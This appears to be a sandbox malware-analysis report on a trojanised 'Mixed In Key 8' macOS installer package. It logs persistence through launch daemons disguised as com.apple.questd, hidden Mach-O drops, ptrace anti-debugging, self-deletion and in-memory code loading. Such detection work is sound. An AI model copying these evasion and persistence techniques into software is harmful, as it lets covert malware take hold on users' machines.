Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/.BC.T_ZOvbfz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/MIKAudio	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_VcYn6z -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/MIKAudio	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/.BC.D_aZpj8b -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/Current	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_SBVZDO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/.BC.D_98wah1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/Current	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/.BC.D_DNd0rz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Resources	Jump to behavior

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Icon File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Resources/.BC.T_hJbyHw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Resources/mik.icns	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Icon File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_qT9ha5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/Sparkle.icns	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Icon File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_x9fPaE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/Sparkle.icns	Jump to behavior

Source: /usr/bin/osascript (PID: 642)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 648)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 652)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 656)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 672)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 680)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 684)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 688)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 692)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 696)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 723)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 731)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 660)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 664)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 668)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 673)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 700)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 704)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 708)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 712)	Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 716)	Random device file read: /dev/random

Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 642)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 648)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 652)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 656)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 672)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 680)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 684)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 688)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 692)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 696)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 723)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 731)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 660)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 664)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 668)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 673)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 700)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 704)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 708)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 712)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 716)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	XML plist file created: /private/var/db/.dat.nosync026b.2FVXZ6	Jump to dropped file
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Binary plist file created: /private/var/db/receipts/com.mixedinkey.installer.plist	Jump to dropped file
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	XML plist file created: /Library/Receipts/InstallHistory.plist	Jump to dropped file
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor (PID: 631)	XML plist file created: /private/var/db/.dat.nosync0277.gybxWI	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	XML plist file created: /Users/berri/Library/LaunchAgents/com.apple.questd.plist	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	XML plist file created: /Library/LaunchDaemons/com.apple.questd.plist	Jump to dropped file
Source: /Library/AppQuest/com.apple.questd (PID: 647)	XML plist file created: /private/var/root/Library/LaunchAgents/com.apple.questd.plist	Jump to dropped file

Source: /Library/mixednkey/toolroomd (PID: 639)	Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchDaemons/com.apple.questd.plist	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/berri/Library/LaunchAgents/com.apple.questd.plist	Jump to behavior
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /var/root/Library/LaunchAgents/com.apple.questd.plist

Source: /Library/mixednkey/toolroomd (PID: 639)

Launch daemon created File created: /Library/LaunchDaemons/com.apple.questd.plist

Jump to behavior

Source: /Library/mixednkey/toolroomd (PID: 639)	Launch agent created File created: /Users/berri/Library/LaunchAgents/com.apple.questd.plist			Jump to behavior
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Launch agent created File created: /var/root/Library/LaunchAgents/com.apple.questd.plist

Hooking and other Techniques for Hiding and Protection:

App bundle contains hidden files/directories

Show sources

Source: archive file from PKG submission	Hidden file : Mixed_In_Key_8.pkg/Scripts/._postinstall
Source: archive file from PKG submission	Hidden file : Mixed_In_Key_8.pkg/Scripts/Scripts/._postinstall

Contains functionality related to in-memory code execution

Show sources

Source: extracted submission file Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _NSLinkModule
Source: extracted submission file Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _NSUnLinkModule
Source: extracted submission file Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _NSDestroyObjectFileImage
Source: extracted submission file Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _NSCreateObjectFileImageFromMemory
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _NSLinkModule
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _NSUnLinkModule
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _NSDestroyObjectFileImage
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _NSCreateObjectFileImageFromMemory
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _NSLinkModule
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _NSUnLinkModule
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _NSDestroyObjectFileImage
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _NSCreateObjectFileImageFromMemory
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _NSLinkModule
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _NSUnLinkModule
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _NSDestroyObjectFileImage
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _NSCreateObjectFileImageFromMemory
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _NSLinkModule
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _NSUnLinkModule
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _NSDestroyObjectFileImage
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _NSCreateObjectFileImageFromMemory
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _NSLinkModule
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _NSUnLinkModule
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _NSDestroyObjectFileImage
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _NSCreateObjectFileImageFromMemory
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _NSLinkModule
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _NSUnLinkModule
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _NSDestroyObjectFileImage
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _NSCreateObjectFileImageFromMemory
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _NSLinkModule
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _NSUnLinkModule
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _NSDestroyObjectFileImage
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _NSCreateObjectFileImageFromMemory

Creates hidden Mach-O files

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden Mach-O file written: Mach-O 64 bit: /Users/berri/Library/.b0MbtGgfS			Jump to dropped file
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Hidden Mach-O file written: Mach-O 64 bit: /private/var/root/Library/.osPtRL91w			Jump to dropped file

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	PTRACE system call (PT_DENY_ATTACH): PID 639 denies future traces
Source: /Library/AppQuest/com.apple.questd (PID: 647)	PTRACE system call (PT_DENY_ATTACH): PID 647 denies future traces

Moves itself during installation or deletes itself after installation

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)

File deleted: /Users/berri/Desktop/Mixed In Key 8.pkg

Jump to behavior

Process executable has a file extension which is uncommon (probably to disguise the executable)

Show sources

Source: /usr/bin/sudo (PID: 647)

Process executable with extension: /Library/AppQuest/com.apple.questd

Process path indicates hidden application bundle (probably to disguise it)

Show sources

Source: /usr/libexec/security_authtrampoline (PID: 643)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 643)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 649)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 649)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 653)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 653)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 657)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 657)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 674)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 674)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 681)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 681)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 685)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 685)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 689)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 689)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 693)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 693)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 697)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 697)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 724)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 724)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 732)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 732)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 661)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 661)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 665)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 665)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 669)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 669)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 677)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 677)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 701)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 701)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 705)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 705)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 709)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 709)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 713)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 713)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /usr/libexec/security_authtrampoline (PID: 717)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 717)	Application without .app extension: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid

Source: /Library/mixednkey/toolroomd (PID: 639)	Launch agent created File created: /Users/berri/Library/LaunchAgents/com.apple.questd.plist	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Launch agent created File created: /Library/LaunchDaemons/com.apple.questd.plist	Jump to behavior
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Launch agent created File created: /var/root/Library/LaunchAgents/com.apple.questd.plist

Source: .hier_officeFontsPreview.ttf.e.330.dr

Binary or memory string: Jvmci

Language, Device and Operating System Detection:

Reads process information of other processes

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.640 -> queries PID 640
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.634 -> queries PID 634
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.630 -> queries PID 630
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.629 -> queries PID 629
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.626 -> queries PID 626
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.625 -> queries PID 625
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.623 -> queries PID 623
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.619 -> queries PID 619
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.618 -> queries PID 618
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.617 -> queries PID 617
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.616 -> queries PID 616
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.615 -> queries PID 615
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.614 -> queries PID 614
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.613 -> queries PID 613
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.612 -> queries PID 612
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.611 -> queries PID 611
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.605 -> queries PID 605
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.580 -> queries PID 580
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.567 -> queries PID 567
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.565 -> queries PID 565
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.538 -> queries PID 538
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.534 -> queries PID 534
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.533 -> queries PID 533
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.495 -> queries PID 495
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.461 -> queries PID 461
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.449 -> queries PID 449
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.448 -> queries PID 448
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.408 -> queries PID 408
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.406 -> queries PID 406
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.398 -> queries PID 398
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397
Source: /Library/mixednkey/toolroomd (PID: 639)	Sysctl requested: kern.procargs2 (1.49) only found for 1.49.396 -> queries PID 396
